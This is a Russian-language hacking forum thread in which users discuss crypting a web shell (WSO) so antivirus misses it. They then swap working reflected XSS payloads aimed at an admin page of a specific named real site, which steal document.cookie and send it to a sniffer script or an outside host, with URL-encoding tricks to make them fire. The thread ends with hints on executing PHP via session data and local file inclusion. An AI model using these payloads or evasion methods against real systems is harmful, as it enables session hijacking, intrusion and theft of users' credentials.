Какой прогой можно криптонуть шелл?
штобы и код срабатывал и антивирем непалился)

wso вполне нормальный и не палится

че -то не очень верю в это ! в моем случае не работает. я спросил здесь, мне сказали, что хост блокирует. (wso)

http://bans.eqline.ru/admin/add_ban.php/"><script>alert(document.cookie)</script>

если будем засылть на сниффер
типа document.location.href="http://site/sniff.php?"+document.cookie;
то XSS не отрабатывет, убираем ? и все ок,но не то ))))

в чем проблема?

вот так работает редирект с куками
http://bans.eqline.ru/admin/add_ban.php/%22%3E%3Cscript%3Edocument.location.assign(%22http ://ya.ru/%3F%22+document.cookie);%3C/script%3E%3C!--

короче нужно ? заменить на %3F

так же работает
http://bans.eqline.ru/admin/add_ban.php/%22%3E%3Cscript%3Edocument.location.href=%22http://site/sniff.php%3f%22+document.cookie;%3C/script%3E%3C!--

__________________
Появляюсь редко. Важные дела в реале.

2AFoST спасибо


И такой еще вопрос, что дает возможность записи пхп кода в сессию???

прямая посылка изменяимых даннх (пхп кодэ) юзверя от которого ты дейсвуешь видимо

если есть локальный инклуд - даёт возможность инклудить код и испольнить его.

__________________
Появляюсь редко. Важные дела в реале.

ок понял, жаль инклуда нету.